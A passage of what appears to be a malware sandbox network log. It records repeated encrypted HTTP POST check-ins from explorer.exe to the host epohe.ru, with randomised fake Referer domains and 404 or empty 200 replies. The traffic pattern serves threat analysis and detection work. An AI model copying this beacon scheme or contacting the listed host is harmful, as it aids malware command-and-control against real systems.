                                              Sep 2, 2024 11:42:36.826939106 CEST281OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 53 5d b6 a7
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vuS]fAhb")V1D4f~+&>PV<NY; Lv[P`BZ4h-\K.{<}Hm(UMF](z.1
                                              Sep 2, 2024 11:42:37.744398117 CEST475INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:37 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.449747102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:42:37.752362013 CEST271OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://sloulillyitjtj.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 128
                                              Host: epohe.ru
                                              Sep 2, 2024 11:42:37.752388000 CEST128OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 51 00 fb b8
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vuQn/bCum|Y;ss09
                                              Sep 2, 2024 11:42:38.679538012 CEST475INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:38 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.449748102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:42:38.766779900 CEST270OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://ldwswurfvgvwu.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 197
                                              Host: epohe.ru
                                              Sep 2, 2024 11:42:38.766807079 CEST197OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 23 5c b5 f5
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vu#\PEW;5'b%Wfo7D:`W48xsV&,+[/z)V3`cl
                                              Sep 2, 2024 11:42:39.714164019 CEST137INHTTP/1.1 200 OK
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:39 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.449749102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:42:39.728411913 CEST273OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://poatfeiydcmxgiom.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 358
                                              Host: epohe.ru
                                              Sep 2, 2024 11:42:39.728432894 CEST358OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 39 2c c5 ab
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vu9,V5^;QZwi~.XZsA=vQKkDv*sz2|c! }INbVQlSravJ.Mc[R/
                                              Sep 2, 2024 11:42:40.626892090 CEST475INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:40 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.449750102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:42:40.637253046 CEST272OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://mhwdtchfjlofmuv.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 247
                                              Host: epohe.ru
                                              Sep 2, 2024 11:42:40.637279034 CEST247OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 61 37 f1 81
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vua7dOGgdkBd)|<,J"9r{B,;Dzt$j;8<<_Ib*j`4?60ej>?Ukd9DB"
                                              Sep 2, 2024 11:42:41.556263924 CEST475INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:41 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.449751102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:42:41.565570116 CEST272OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://dyovtuslfwnpfvr.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 288
                                              Host: epohe.ru
                                              Sep 2, 2024 11:42:41.565582991 CEST288OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 40 1c c8 bc
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vu@qNMwHmTQ4D@DlnQNQ7SA9isPGk"N.FR{rA3A"thqFchAt 872
                                              Sep 2, 2024 11:42:42.462212086 CEST475INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:42 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.449752102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:42:42.470792055 CEST271OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://agwwkiqfcegkjh.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 188
                                              Host: epohe.ru
                                              Sep 2, 2024 11:42:42.470805883 CEST188OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 5f 51 c0 93
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vu_QptyvHgr?jwU>=]IG^*~#xu*jMRBR,+
                                              Sep 2, 2024 11:42:43.396027088 CEST475INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:43 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.449753102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:42:43.405877113 CEST268OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://ivdbemhblrd.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 201
                                              Host: epohe.ru
                                              Sep 2, 2024 11:42:43.405930042 CEST201OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 62 5f e3 fa
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vub_kKVTznkt109g0#! &+F4KYQuh-FV)*}\HW
                                              Sep 2, 2024 11:42:44.306678057 CEST475INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:44 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.449754102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:42:44.324088097 CEST270OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://qsasppprtpxcq.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 185
                                              Host: epohe.ru
                                              Sep 2, 2024 11:42:44.324112892 CEST185OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 23 52 bc f7
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vu#RRSue{[|-Xx38ZzzoiL3u9Ihg6/zs(%I
                                              Sep 2, 2024 11:42:45.219665051 CEST137INHTTP/1.1 200 OK
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:45 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              18192.168.2.449755102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:42:45.227931023 CEST273OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://iwrtbbnydhaevbhj.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 130
                                              Host: epohe.ru
                                              Sep 2, 2024 11:42:45.227952957 CEST130OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 2c 53 c5 e4
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vu,SdTjT~hdd\q~RF@l3
                                              Sep 2, 2024 11:42:46.144552946 CEST475INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:42:45 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              19192.168.2.449756102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:42:46.152132988 CEST271OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://scammxgavejetg.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 353
                                              Host: epohe.ru
